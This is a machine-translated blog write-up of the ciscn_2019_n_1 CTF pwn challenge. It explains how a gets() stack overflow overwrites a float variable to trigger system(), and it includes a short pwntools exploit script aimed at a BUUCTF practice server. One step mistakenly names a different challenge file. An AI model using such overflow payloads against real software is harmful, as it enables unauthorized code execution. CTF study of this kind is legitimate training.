当前位置:网站首页>ciscn_ 2019_ n_ one
ciscn_ 2019_ n_ one
2022-07-23 23:32:00 【Long street 395】
List of articles
One 、 see file
First file ./warmup_csaw_2016 Check the file type and then checksec --file=warmup_csaw_2016 Check the file protection .


Two 、IDA Decompile
After decompilation, it seems that it is different from the previous questions
It seems that there is a function that is suspicious :
double-click func() Function to view the source code, you can see when v2 = 11.28125 There will be a system call .
View assembly code double click cs:dword_4007F4 You can see 11.28125 In memory 16 The base number is represented by 0x41348000.
View stack structure , here var_30 yes v1, and var_4 yes v2, need (0x30-0x04)=44 A byte can overflow the stack , Finally, fill in 11.28125 The corresponding hexadecimal number 0x41348000.
3、 ... and 、 Code
from pwn import *
# remote() Establish a remote connection , To specify ip and port
io = remote('node4.buuoj.cn', 26965)
payload = b'a'*(0x30 - 0x4) + p64(0x41348000)
io.sendline(payload) # send data
io.interactive() # And shell Interact

summary
Or a stack overflow problem , We found two variables in that suspicious function ,v1,v2, Only one v1
Can pass gets() Function input , But the condition of our judgment is v2=?? a number , We will make changes as follows v2
Is it worth it , The answer is through v1 The overflow changes v2 In the value of the .
边栏推荐
- PHP(2)
- BUUCTF -rip
- DGS之文件上传
- Navicat15 download and installation
- Series of articles | the way to advance the microservice architecture in the cloud native era - best practices of microservice splitting
- 二,数字逻辑功能单元
- Solidity-delegateCall插槽冲突分析与解决
- ArraysList 与顺序表 ——模拟实现
- [nuxt 3] (IX) server routing
- JS convert numbers to uppercase
猜你喜欢

Analytic hierarchy process (matlab)

This article will show you what typescript is
![[web vulnerability exploration] SQL injection vulnerability](/img/94/dc84d7790d5a1823e4b73d513e86be.png)
[web vulnerability exploration] SQL injection vulnerability

Tap series article 8 | tap Learning Center - learn through hands-on tutorials

Chinese NFT? NFR was born
![[leetcode ladder] linked list · 206 reverse linked list](/img/49/f3322c7abc9a0c7cf637264e677bc2.jpg)
[leetcode ladder] linked list · 206 reverse linked list

PHP(2)

jarvisoj_level2

ArraysList 与顺序表 ——模拟实现

How to migrate databases in the flask framework
随机推荐
cmake 编译工具小记
ret2shellcode
[audio and video technology] video quality evaluation MSU vqmt & Netflix vmaf
DGS的错误处理
DGS初识
ubtun 更新源
DGS之N+1选择问题
ES6 other syntax and extended syntax summary
Stm32mp1 M4 bare metal cubeide Development Guide Chapter 6 stm32cube firmware package
归并排序思想应用
【计算机三级信息安全】访问控制模型
Detailed explanation of pseudo instructions in assembly language (with examples)
1000 okaleido tiger launched binance NFT, triggering a rush to buy
2、 Digital logic functional unit
Baidu editor uploads pictures and sets custom directories
Lixia action 2022 Yuanqi digital round table forum will be launched soon
strncat() strncmp()
A deserialized CTF question sharing
What are the three-party payment companies?
[nuxt 3] (IX) server routing